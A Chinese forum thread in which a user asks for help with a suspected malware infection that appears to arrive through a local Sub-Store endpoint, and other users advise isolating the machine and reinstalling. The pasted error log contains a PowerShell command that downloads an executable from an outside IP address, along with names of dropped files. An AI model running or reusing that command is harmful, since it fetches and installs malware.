电脑好像中病毒了,佬帮我排除下。

干啥啥不行 2026-09-04 22:37 1

这两天电脑莫名其妙弹出一个url

http://127.0.0.1:38324/api/preview/sub

内容是


{"status":"success","data":{"original":[{"name":"poc","type":"ss","server":"127.0.0.1","port":1080,"cipher":"aes-128-gcm","password":"pass123","id":0,"_subName":"poc"}],"processed":[{"name":"iwr : �ļ���C:\Users\LZJ\AppData\Local\Temp\dl.exe��������һ����ʹ�ã���˸ý����޷����ʴ��ļ���\r\n����λ�� ��:1 �ַ�: 1\r\n+ iwr '[https://66.179.31.11/sideload.exe](https://66.179.31.11/sideload.exe)' -OutFile 'C:\Users\LZJ\AppDat ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n    + CategoryInfo          : NotSpecified: (:) [Invoke-WebRequest], IOException\r\n    + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand\r\n \r\n","type":"ss","server":"127.0.0.1","port":1080,"cipher":"aes-128-gcm","password":"pass123","id":0,"_subName":"poc"}]}}

前两天我都不注意直接关了,今天又弹出来了,仔细看了电脑多了个dl.exe文件,还多了个360speedld.exesomkernl.dll,正在我电脑上运行。


直接访问127.0.0.1:38324是sub store的端口,我电脑用的是mihomo-party。


现在正在让AI分析这几个文件是什么东西。


有没有佬帮我下。

最新回复 (9)
  • Enze 09-04 22:40
    1

    建议立刻断网,备份,重装,同时在别的可以信任的设备上把一些重要的账号退出其他设备、改密码


    备份的时候注意忽略掉可执行文件、库文件、带一些默认脚本执行行为的文件等等,这个你可以等重装完成后再慢慢处理。


    强烈不建议自己查杀,也不建议这个时候再去安装杀毒软件,这种安全是谁先拿到权限谁赢,我们又不是专业分析恶意样本的专家,不要赌这个。

  • Mic 09-04 22:43
    2

    建议安装卡巴斯基杀毒,有试用版本


  • lejav 09-04 22:50
    3

    直接联系喜羊羊。提前写好800字小作文

  • Fynix 09-04 22:50
    4

    可以试试zcode,昨天我就是用的它把我系统更新报错安装不上补丁,系统频繁蓝屏的问题都给解决了,全程自动修复

  • 君子慎独 09-04 22:52
    5

    直接卡巴斯基标准版有免费版激活码的,然后自查一波

  • 路边一条狗 09-04 22:58
    6

    二楼说的是对的,要是真打算手动杀毒,也应该格式化一块硬盘重做个系统,把现在的系统盘+数据盘全都外挂,当数据盘来杀。


    如果没什么重要的东西就直接删除磁盘分区,重做系统。


    新病毒可能这会能过360,半个月之后就过不了了,你也可以留着硬盘等一个月再杀 ^-^

  • 干啥啥不行 楼主 09-04 23:02
    7

    用的360的2010年证书,c2服务器证书只到9月10号,而且怎么感染的我也大概知道了。

  • lejav 09-04 23:08
    8

    病毒吧吧主,且有收集病毒怪癖

  • 干啥啥不行 楼主 09-04 23:09
    9

* 帖子来源Linux.do
返回